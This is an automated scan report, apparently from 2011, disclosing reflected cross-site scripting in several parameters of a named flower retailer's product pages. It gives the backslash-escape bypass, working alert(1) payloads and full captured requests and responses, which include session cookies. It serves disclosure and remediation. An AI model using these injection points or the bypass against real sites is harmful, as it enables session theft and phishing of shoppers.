XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, products.proflowers.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:28:43 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. Cross-site scripting (reflected)

1.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

1.2. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

1.3. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

1.4. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

1.5. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

1.6. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

1.7. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

2. Cookie scoped to parent domain

2.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

2.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

2.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

3. Cross-domain Referer leakage

3.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

3.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

3.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

4. Cross-domain script include

4.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

4.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

4.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

5. Cookie without HttpOnly flag set

5.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

5.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

5.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

6. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141b9\"%3balert(1)//08331235fa2 was submitted in the Ref parameter. This input was echoed as 141b9\\";alert(1)//08331235fa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef141b9\"%3balert(1)//08331235fa2 HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:39 GMT
Content-Length: 150181


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050137","30050137","30050137","428685","27","HomeNoRef141b9\\";alert(1)//08331235fa2","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

1.2. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3e13\"%3balert(1)//07e77d7addd was submitted in the tile parameter. This input was echoed as c3e13\\";alert(1)//07e77d7addd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carouselc3e13\"%3balert(1)//07e77d7addd&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:12:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:07 GMT
Content-Length: 148302


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
tpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_carouselc3e13\\";alert(1)//07e77d7addd" != "")
           {
               s.eVar20="PFC_hmpg_carouselc3e13\\";alert(1)//07e77d7addd_";
           }
           s.eVar37=cleanString("PFC:Product:30050137_Deluxe Mother...s Day Bouquet");
           s.eVar51="HPC";
           s.events =
...[SNIP]...

1.3. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2010f\"%3balert(1)//114dc093c72 was submitted in the trackingpgroup parameter. This input was echoed as 2010f\\";alert(1)//114dc093c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC2010f\"%3balert(1)//114dc093c72&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:11:28 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:11:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:11:28 GMT
Content-Length: 143627


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
");
           s.prop1 = cleanString("PFC:Product:30050137-DeluxeMother...sDayBouquet");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           else if ( "HPC2010f\\";alert(1)//114dc093c72" == "MerchCart" ) {
                s.eVar6=cleanString("_:30050137_");
           }
           
...[SNIP]...

1.4. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221e8\"%3balert(1)//f195e3e5061 was submitted in the tile parameter. This input was echoed as 221e8\\";alert(1)//f195e3e5061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA221e8\"%3balert(1)//f195e3e5061&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:26:08 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:26:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:08 GMT
Content-Length: 146314


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
_leftpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA221e8\\";alert(1)//f195e3e5061" != "")
           {
               s.eVar20="PFC_hmpg_podA221e8\\";alert(1)//f195e3e5061_";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodVi
...[SNIP]...

1.5. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ea7\"%3balert(1)//17cc815a216 was submitted in the trackingpgroup parameter. This input was echoed as 83ea7\\";alert(1)//17cc815a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS83ea7\"%3balert(1)//17cc815a216&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:23:30 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:23:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:29 GMT
Content-Length: 141553


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lant");
           s.prop1 = cleanString("PFC:Product:30003767-TheUltimateOfficePlant");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           else if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCart" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           
...[SNIP]...

1.6. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff98b\"%3balert(1)//1f7c8e9547f was submitted in the viewpos parameter. This input was echoed as ff98b\\";alert(1)//1f7c8e9547f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6ff98b\"%3balert(1)//1f7c8e9547f&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
